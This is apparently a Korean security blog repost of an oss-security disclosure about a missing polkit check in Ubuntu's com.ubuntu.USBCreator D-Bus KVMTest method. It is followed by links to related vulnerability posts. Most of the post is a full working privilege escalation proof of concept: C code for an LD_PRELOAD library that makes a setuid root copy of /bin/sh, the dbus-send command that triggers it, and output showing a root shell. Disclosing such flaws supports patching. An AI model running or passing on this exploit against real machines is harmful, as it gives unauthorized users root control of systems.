728x90
[as-per previous discussion on the vendors list, skipping closed discussion of low-severity issue] On my Ubuntu VM, I have a D-Bus service listening on com.ubuntu.USBCreator. As far as I can tell, this is installed by default. It looks like the author intended for all the methods to call check_polkit, but KVMTest doesn't. This seems like an obvious mistake, and the following appears to work on my machine: $ cat > test.c void __attribute__((constructor)) init (void) { chown("/tmp/test", 0, 0); chmod("/tmp/test", 04755); } ^D $ gcc -shared -fPIC -o /tmp/test.so test.c $ cp /bin/sh /tmp/test $ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so" method return sender=:1.4364 -> dest=:1.7427 reply_serial=2 $ ls -l /tmp/test -rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test $ /tmp/test # id euid=0(root) groups=0(root)
728x90
'취약점 정보1' 카테고리의 다른 글
Ubuntu local privilege escalation posted to oss-security (still unpatched; includes PoC) (0) | 2015.04.26 |
---|---|
Android wpa_supplicant WLAN Direct remote buffer overflow (0) | 2015.04.24 |
wpa_supplicant P2P SSID processing vulnerability (0) | 2015.04.24 |
SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability (0) | 2015.04.23 |
Analyzing the Magento Vulnerability (0) | 2015.04.23 |